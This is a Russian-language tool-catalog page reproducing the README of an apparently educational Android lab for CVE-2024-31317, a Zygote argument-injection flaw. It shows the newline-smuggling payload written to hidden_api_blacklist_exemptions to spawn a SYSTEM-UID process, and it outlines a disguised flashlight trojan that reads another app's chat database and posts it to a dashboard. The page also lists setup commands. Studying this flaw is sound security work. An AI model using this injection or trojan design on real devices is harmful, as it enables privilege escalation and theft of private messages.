Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ZygoteExploitDemo — Образовательная демонстрация уязвимости Zygote Injection CVE-2024-31317 на Android | Kitploit
Инструменты/GitHubGitHub/gitamans/zygoteexploitdemo
Безопасность AndroidПовышение привилегийАнализ уязвимостейЭксплуатацияПентестинг мобильных приложенийТестирование на ПроникновениеМобильная безопасностьОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubgitamans/zygoteexploitdemo
225 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ZygoteExploitDemo

Образовательная демонстрация уязвимости Zygote Injection CVE-2024-31317 на Android

Репозиторий

🔥 ZygoteExploitDemo — CVE-2024-31317: лаборатория безопасности Android

🚨 Образовательная демонстрация уязвимости внедрения в Android Zygote

GitHub stars GitHub forks GitHub license


📋 Обзор

Эта лаборатория демонстрирует CVE-2024-31317 — критическую уязвимость Android, которая позволяет вредоносному приложению повышать привилегии до уровня SYSTEM (UID 1000) и обходить песочницу Android для чтения данных других приложений в реальном времени.

🎯 Что показывает эта демонстрация


🏗️ Структура проекта

root@kitploit:~
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/              # Victim app (Jetpack Compose)
│   │   ├── Encrypted messages stored in SQLite
│   │   └── Simulates WhatsApp-style encryption
│   │
│   ├── FlashlightPro/           # Malicious app with exploit
│   │   ├── Normal flashlight UI (distraction)
│   │   ├── Background exploit service
│   │   └── WRITE_SECURE_SETTINGS permission
│   │
│   └── MonitorService/          # SYSTEM-level reader
│       ├── Runs with UID 1000 after exploit
│       ├── Reads SecureChat database
│       └── Exfiltrates to dashboard
│
├── 📊 dashboard/                # Flask web dashboard
│   └── app.py                   # Shows stolen messages live
│
├── 📜 scripts/                  # Automation scripts
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/                 # Exploit information
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/                # Code templates
    ├── exploit_template.java
    └── dashboard_template.html

🔧 Технические детали

Уязвимость

CVE-2024-31317 существует в том, как процесс Zygote в Android обрабатывает системный параметр hidden_api_blacklist_exemptions. Из-за отсутствия санитизации входных данных злоумышленник может внедрить символы новой строки, чтобы добавить произвольные аргументы к командам Zygote.

Вектор атаки:

root@kitploit:~
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +
    "7\n" +
    "--setuid=1000\n" +     // Run as SYSTEM
    "--setgid=1000\n" +     // Run as SYSTEM group
    "--invoke-with\n" +
    "am start-service ...;\n"
);

Затронутые версии

ВерсияСтатус
Android 9 - 14❌ Уязвима (до июньского патча 2024)
Android 14+✅ Исправлено (обновление безопасности июня 2024)
Android 15+✅ Защищена

🚀 Быстрый старт

Предварительные требования

  • ✅ Android Studio (последняя версия)
  • ✅ Python 3.8+ с Flask
  • ✅ Android SDK с platform-tools
  • ✅ 10 ГБ свободного места на диске для эмулятора

Шаг 1: Клонирование репозитория

root@kitploit:~
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo

Шаг 2: Настройка уязвимого эмулятора

root@kitploit:~
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# Start the emulator
emulator -avd vulnerable_android_12

Шаг 3: Сборка и установка приложений

root@kitploit:~
# In a new terminal
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh

Шаг 4: Запуск дашборда

root@kitploit:~
cd ../dashboard
pip3 install flask flask-cors
python3 app.py

📱 Откройте http://localhost:5000 в вашем браузере

Шаг 5: Запуск эксплойта

root@kitploit:~
cd ../scripts
python3 run_exploit.py

Шаг 6: Наблюдайте за магией ✨

  1. Откройте приложение SecureChat в эмуляторе
  2. Отправьте несколько тестовых сообщений
  3. Наблюдайте, как они появляются на дашборде мгновенно! 🔴

📸 Демо-видео

🎬 Демо-видео скоро появится


🔬 Как это работает — пошагово

  1. FlashlightPro запрашивает разрешение WRITE_SECURE_SETTINGS
  2. Код эксплойта внедряет вредоносную нагрузку в настройки Zygote
  3. Zygote порождает MonitorService с привилегиями SYSTEM (UID 1000)
  4. Сервис SYSTEM обходит ограничения песочницы Android
  5. Прямое чтение базы данных из /data/data/com.securechat/databases/
  6. Экфильтрация на дашборд Flask через HTTP POST
  7. Отображение похищенных зашифрованных сообщений в реальном времени

📚 Учебные ресурсы

  • Бюллетени безопасности Android
  • Детали CVE-2024-31317
  • Оригинальный PoC от CleoV2

🤝 Вклад в проект

Вклад приветствуется! Пожалуйста:

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функции
  3. Отправьте Pull Request

Области для вклада:

  • 🎯 Дополнительные эксплойт-пейлоады
  • 🛡️ Более совершенные методы обнаружения
  • 📖 Улучшенная документация
  • 🌍 Перевод на другие языки

📄 Лицензия

Лицензия MIT — подробности в файле LICENSE


👨‍💻 Автор

Aman — @GitAmanS


⭐ Поддержка

Если вы нашли это полезным для обучения, пожалуйста, поставьте звезду! ⭐


Сделано исследователем безопасности для исследователей безопасности

Помните: с большой силой приходит большая ответственность 🕷️

Скачать инструмент
СтадияОписаниеВизуал
1Пользователь устанавливает безобидное на вид приложение «FlashlightPro»🔦
2Приложение эксплуатирует CVE-2024-31317 для получения доступа к SYSTEM💉
3Сервис уровня SYSTEM читает сообщения «SecureChat»👁️
4Похищенные сообщения появляются на живом дашборде📊